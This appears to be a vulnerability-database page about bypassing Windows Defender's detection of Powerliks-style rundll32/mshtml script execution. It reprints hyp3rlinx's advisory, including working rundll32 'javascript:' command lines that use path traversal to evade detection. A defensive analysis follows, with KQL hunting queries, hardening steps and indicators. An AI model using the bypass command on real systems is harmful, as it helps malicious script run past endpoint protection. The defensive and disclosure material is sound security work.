Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G

Exploit Author: hyp3rlinx Analysis Author: www.bubbleslearn.ir Category: Local Language: Shell Published Date: 2024-04-02 
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec     
 

[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message.

Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again.
The fix was short lived as I find yet another third trivial bypass soon after.


[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')


[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg


[Network Access]
Local


[Severity]
High


[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601


[Disclosure Timeline]
Vendor Notification:  
February 16, 2024 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


Microsoft Windows Defender — Detection & Mitigation Bypass: TrojanWin32Powessere.G (Powerliks) — Analysis and Defensive Guidance

This article reviews a class of mitigation bypasses reported against Microsoft Defender’s detection for TrojanWin32Powessere.G (commonly associated with “Powerliks” rundll32/jscript abuse). It summarizes the technique at a high level, explains why the tactics worked historically, and — most importantly — provides detection, hardening and safe-testing guidance for defenders and incident responders. This content focuses on defensive analysis and does not provide exploit-ready payloads or step-by-step attack recipes.

Executive summary

  • TrojanWin32Powessere.G is a detection name tied to techniques where attackers abuse legitimate Windows hosts (rundll32.exe + mshtml/jscript) to launch script-based payloads.
  • Researchers have disclosed multiple mitigation bypasses over 2022–2024 that manipulated argument parsing and COM/URL handler routing to evade heuristics and blocking logic.
  • Microsoft has iteratively patched these bypasses; however, small differences in command-line parsing or argument separators can sometimes slip past signatures or heuristics until rules are updated.
  • Defenders should prioritize blocking dangerous execution paths (AppLocker/WDAC), harden Defender settings, and add behavioral detections that do not rely solely on exact string matches.

How the technique works (high-level)

At a conceptual level the technique abuses a legitimate system binary (rundll32.exe) to host a scripting engine — historically mshtml/jscript — that can interpret inline scripts or load script-hosted content. Detection logic often looks for obvious indicators such as specific parameter tokens or well-known calling patterns. Attackers then craft alternate encodings/argument separators and path traversal variants so the command line no longer matches the original signatures, but the system still resolves and executes the script.

Key elements that made these bypasses effective:

  • Use of a signed, trusted binary (rundll32.exe) to evade binary allowlisting checks.
  • Variation in how Windows parses quoted arguments, escape sequences, or path separators — small differences can lead to mismatches against simple signature rules.
  • Reliance on mshtml/jscript COM entry points that are allowed by default for backward compatibility, creating an attack surface for script hosting.

Why simple signature fixes can be short-lived

Signature-based detections that match exact substrings (for example, a fixed token sequence) can be brittle. Attackers with knowledge of what is matched can slightly alter separators, encodings, or add redundant path elements to avoid those exact matches while preserving behavior. A resilient defensive approach combines signatures with behavioral, context-aware telemetry and blocking of entire risky execution patterns.

Defensive recommendations (prioritized)

  • Apply vendor updates and signatures — ensure Windows and Defender signature updates are current. Microsoft has released mitigations and rule updates after researcher disclosures.
  • Enable and enforce application control — use AppLocker or Windows Defender Application Control (WDAC) to restrict execution of scripting hosts and limit rundll32.exe usage to only trusted callers.
  • Harden Attack Surface Reduction (ASR) rules — enable ASR rules that block Office and other vectors from creating child processes or launching script interpreters from non-standard locations.
  • Enable cloud protection and tamper protection in Microsoft Defender to ensure rapid distribution of cloud-delivered protections and prevent attackers from disabling endpoint protections.
  • Whitelist legitimate automation and block odd rundll32 usage — create allowlists that permit known, documented rundll32 usage and flag any rundll32 launches with inline scripting or unusual command-line patterns.
  • Monitor for anomalous parent/child relationships — track when standard system utilities are spawned by uncommon parents (e.g., rundll32.exe launched by a non-system user process).
  • Isolate browser/script components you do not use — if mshtml-based script hosting is not required in an environment, consider reducing exposure by restricting or removing legacy components.

Hunting queries and detection patterns (Defender for Endpoint / Microsoft 365 Defender)

Below are sample defensive hunting queries that can be used to detect suspicious rundll32 usage. These are intended to be used in secure SOC environments and tuned to reduce false positives.

// Example Kusto query for Defender for Endpoint (DeviceProcessEvents)
// Detect rundll32.exe executions with unusual command-line tokens commonly used to host script engines
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine has "javascript:" or ProcessCommandLine has "mshtml"
| where ProcessCommandLine !contains "KnownTrustedToken1"  // tune or remove as needed
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessAccountName, ProcessCommandLine, ReportId
| order by Timestamp desc

Explanation: This query searches process telemetry for rundll32.exe instances with command-line substrings indicative of script-hosting usage (e.g., embedded "javascript" or mshtml references). Tune exceptions to reduce noise in your environment.

// Example Kusto query to find rundll32 executed from non-standard parent processes
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where InitiatingProcessFileName !in ("explorer.exe","svchost.exe","services.exe","taskeng.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessAccountName, ProcessCommandLine
| order by Timestamp desc

Explanation: This query highlights rundll32.exe runs where the parent process is not one of the expected Windows hosts, which can indicate abuse.

Safe testing practices (lab guidance)

  • Never test bypasses on production systems or networks. Use isolated lab VMs that are fully offline or on an isolated VLAN.
  • Use benign, instrumented samples to validate detection logic (for example: no-op scripts or synthetic telemetry) rather than active malware or bypass strings.
  • Capture full telemetry (process command lines, parent process tree, registry, and file writes) when testing so you can craft robust detections based on behavior rather than exact payloads.
  • Coordinate with vendor support and follow disclosure policies if you discover a new bypass.

Incident response: what to look for

  • Unexpected rundll32.exe launches with long or oddly formatted command-line arguments, particularly those containing “javascript”/“mshtml” or multiple separators/escape sequences.
  • Child processes or network connections initiated by rundll32.exe or mshtml-hosted script contexts.
  • Creation of scheduled tasks, persistence via registry autorun entries, or dropped files in temporary or user profile directories immediately after such launches.
  • Unusual parent process relationships and activity occurring outside normal business hours.

Example indicators of suspicious behavior (safe, non-actionable)

Telemetry TypeSuspicious Pattern
Processrundll32.exe launched with inline script-like command-line tokens or references to script hosting components
Parent/Childrundll32.exe spawned by non-standard processes or by user-level processes from unexpected directories
FileShort-lived or unexpectedly created HTML/JS files in temp or profile folders following rundll32 activity
NetworkOutbound connections shortly after suspicious rundll32/mshtml activity to unknown hosts

Timeline & attribution

DateEvent
2022Initial public reporting of mshtml path traversal bypasses for Defender detection.
Feb 7, 2024Researcher disclosed alternate bypass techniques relying on command-line encoding that were later patched.
Feb 16, 2024Public disclosure and vendor notification (researcher: hyp3rlinx / John Page).

References and further reading

  • Research advisory (hyp3rlinx) — for context and researcher write-ups.
  • Microsoft documentation on AppLocker, WDAC and Defender for Endpoint hardening — consult Microsoft Learn for up-to-date guidance.
  • Best practices for secure lab testing and safe malware handling — follow CERT/organization policies and legal guidance.

Closing notes for defenders

The pattern shown by these disclosures is a reminder that legitimate, signed binaries used as hosts for scripts represent a recurring attack surface. Rather than relying exclusively on fixed string matching, build layered defenses: application control, heuristic/behavioral detections, and robust telemetry. Maintain an isolated test environment for validation, and coordinate with vendors when encountering new bypass techniques.